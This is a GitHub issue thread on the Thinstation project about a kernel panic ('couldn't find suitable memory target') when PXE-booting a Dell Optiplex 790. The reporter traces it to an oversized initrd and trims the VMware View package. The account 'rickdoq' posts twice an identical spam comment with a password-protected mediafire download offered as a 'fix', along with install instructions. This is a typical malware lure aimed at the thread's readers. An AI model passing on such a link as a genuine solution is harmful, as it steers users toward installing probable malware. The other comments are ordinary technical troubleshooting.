### ISSUE TITLE
Kernel Panic - error: lib/relocator.c:1455:couldn't find suitable memory target.

### ISSUE THREAD

**Issue by rohrbachger** [Thinstation/thinstation#847]
On Dell optiplex 790 using the onboard graphic card after build --allmodules still we have the kernel panic.
The same hardware but using nvidia graphic card with dual head we have no issue.

On older thinstation versions with older kernel this has been working fine for years.
4GB of memory is installed on all those machines, it's an i5 processor so not too bad.

I tried already bootverbosity=63,  but can´t read messages that fast...
We are doing PXE-boot with iPXE.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Thinstation** [comment]
This usually means the initrd is too big. How big is your image?

**Comment by rohrbachger** [comment]
I removed he vmview package to get the image smaller, it`s know 326MB size.
That works now. Strange is, that my former images is working on the Optiplex with NVIDIA card, and he same image is working on Lenovo M710. 
But his I guess it is the right hint, I will try to get the image smaller.
When I add vmview package I get 569MB for initrd.
The view package is really large, I will check if there is something large not really needed.
The ISO has a size of 596, with vmview,  that is obviously to large.

**Comment by rohrbachger** [comment]
I guess I have found a solution in our case.
In the view package is a large lib for html5 access, in our case no need as we use only pcoip and blast.
The libcef.so located under bin/vmware/view/html5mmr and has a size of 313MB. 
I deleted for testing, so far it seems not needed. I will try in production env with some test candidates.
The life system is the best test system... And we can roll back very fast in pxe environment
Thanks for point in the right direction.
Anyway there is a problem with the new view client. bin/vmware-view uses an array for testing some libs.
This seems no to be supported in busybox in this way. I removed / changed this, but means I changed an original file.
